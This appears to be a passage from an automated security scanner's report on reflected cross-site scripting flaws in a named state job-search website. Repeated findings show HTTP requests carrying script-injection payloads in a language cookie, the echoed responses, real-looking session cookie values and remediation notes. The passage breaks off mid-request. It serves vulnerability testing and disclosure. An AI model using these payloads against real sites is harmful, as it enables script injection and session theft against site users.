PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:15:33'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7E46B";ALERT(1)//47870D01FCB\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9fd5"><img src=a onerror=alert(1)>df5821943b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:15:22'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene9fd5"><img src=a onerror=alert(1)>df5821943b1">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345b0"%3balert(1)//bb034151741 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 345b0";alert(1)//bb034151741 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en345b0"%3balert(1)//bb034151741; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN345B0";ALERT(1)//BB034151741\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 1dd09"><img src=a onerror=alert(1)>14180bf8e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en1dd09"><img src=a onerror=alert(1)>14180bf8e4f">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e8914"><img src=a onerror=alert(1)>6aee311800c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene8914"><img src=a onerror=alert(1)>6aee311800c">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 192b5"%3balert(1)//4deb3a09ea1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 192b5";alert(1)//4deb3a09ea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en192b5"%3balert(1)//4deb3a09ea1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN192B5";ALERT(1)//4DEB3A09EA1\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b001"%3balert(1)//6e8624b8e0ae7c17b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7b001";alert(1)//6e8624b8e0ae7c17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en7b001"%3balert(1)//6e8624b8e0ae7c17b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7B001";ALERT(1)//6E8624B8E0AE7C17B\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ed9d5"><img src=a onerror=alert(1)>d473d92771b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
